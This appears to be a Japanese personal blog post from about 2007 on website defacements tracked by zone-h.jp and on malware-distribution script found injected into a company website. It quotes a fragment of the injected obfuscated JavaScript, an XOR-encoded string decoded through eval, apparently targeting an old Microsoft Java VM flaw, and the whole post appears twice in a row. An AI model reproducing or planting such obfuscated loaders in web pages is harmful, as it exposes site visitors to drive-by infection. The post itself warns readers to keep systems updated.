JPドメインでも改竄はやっぱり多いみたいです。
世の中にはこうした Webの改竄状況をモニターしているサイトがあり、
zone-h.jp の改竄アーカイブ
http://zone-h.jp/component/option,com_attacks/Itemid,17/
を見ると多数リストアップされています。
このリストの最新は日付が2007/1/7で、改竄されたURLが
http://dumpty.nih.go.jp/yoshikishu/default.htm
となってました。nih.go.jp っていうのは厚生労働省のドメイン。
やっぱりお役所のウェブって狙われやすいのかしらん。。
ちなみに、以前書いた、ウイルス配布コードが埋めこまれているWebですが
全く別の、とある企業サイトでも再びウイルスバスターが反応。
HTML ソースを見ると、やはり最後に以下のようなコードが追加されてました。
以前見つけたのは MS-JavaVMの脆弱性を突くタイプで、今回見つけたのも
またおんなじウイルスでした。ウイルス自体は古いものなので、昔こういう
ことが流行ったのかもしれません。
es= の部分が感染コードですね。。
アップデートしてないとウェブを眺めるだけでも感染!
< 埋めこまれていたウイルスコード(悪用厳禁!) >
<script>x=81;es="53;61;48;33;56;51;57;44;119;45;41;53;41;59;119;
71;93;11;5;22;4;11;2;72;26;24;8;81;79;6;27;4;1;72;92;91;3;25;18;22;24;
84;21;25;9;81;22;238;226;237;238;237;235;225;169;248;225;250;169;172;
250;231;235;228;249;175;162;180;253;243;254;255;241;238;166;173;189;
248;237;193;204;199;193;203;215;194;194;218;148;154;139;223;206;220;
192;220;221;219;221;211;
136;248;248;134;133;149;210;218;207;223;210;165;255;229;234;255;";
var ds=new String();ads=es.split(";");k=ads.length-1;for(var j=0;j<k;j++){e=ads[j];gg="d=e";gg=gg+"^x";eval(gg);x+=1;
以前は「あぶないコードの埋めこみ」というと アングラの掲示板などの
専売特許だと思っていたのですが、最近は普通の企業サイトでもこんなこと
があるんですね。。。
アップデートしていないWindowsマシンでウェブを眺めるのはあぶないなぁ
と思いました。物騒な世の中になったもんだなぁと思います。
世の中にはこうした Webの改竄状況をモニターしているサイトがあり、
zone-h.jp の改竄アーカイブ
http://zone-h.jp/component/option,com_attacks/Itemid,17/
を見ると多数リストアップされています。
このリストの最新は日付が2007/1/7で、改竄されたURLが
http://dumpty.nih.go.jp/yoshikishu/default.htm
となってました。nih.go.jp っていうのは厚生労働省のドメイン。
やっぱりお役所のウェブって狙われやすいのかしらん。。
ちなみに、以前書いた、ウイルス配布コードが埋めこまれているWebですが
全く別の、とある企業サイトでも再びウイルスバスターが反応。
HTML ソースを見ると、やはり最後に以下のようなコードが追加されてました。
以前見つけたのは MS-JavaVMの脆弱性を突くタイプで、今回見つけたのも
またおんなじウイルスでした。ウイルス自体は古いものなので、昔こういう
ことが流行ったのかもしれません。
es= の部分が感染コードですね。。
アップデートしてないとウェブを眺めるだけでも感染!
< 埋めこまれていたウイルスコード(悪用厳禁!) >
<script>x=81;es="53;61;48;33;56;51;57;44;119;45;41;53;41;59;119;
71;93;11;5;22;4;11;2;72;26;24;8;81;79;6;27;4;1;72;92;91;3;25;18;22;24;
84;21;25;9;81;22;238;226;237;238;237;235;225;169;248;225;250;169;172;
250;231;235;228;249;175;162;180;253;243;254;255;241;238;166;173;189;
248;237;193;204;199;193;203;215;194;194;218;148;154;139;223;206;220;
192;220;221;219;221;211;
136;248;248;134;133;149;210;218;207;223;210;165;255;229;234;255;";
var ds=new String();ads=es.split(";");k=ads.length-1;for(var j=0;j<k;j++){e=ads[j];gg="d=e";gg=gg+"^x";eval(gg);x+=1;
以前は「あぶないコードの埋めこみ」というと アングラの掲示板などの
専売特許だと思っていたのですが、最近は普通の企業サイトでもこんなこと
があるんですね。。。
アップデートしていないWindowsマシンでウェブを眺めるのはあぶないなぁ
と思いました。物騒な世の中になったもんだなぁと思います。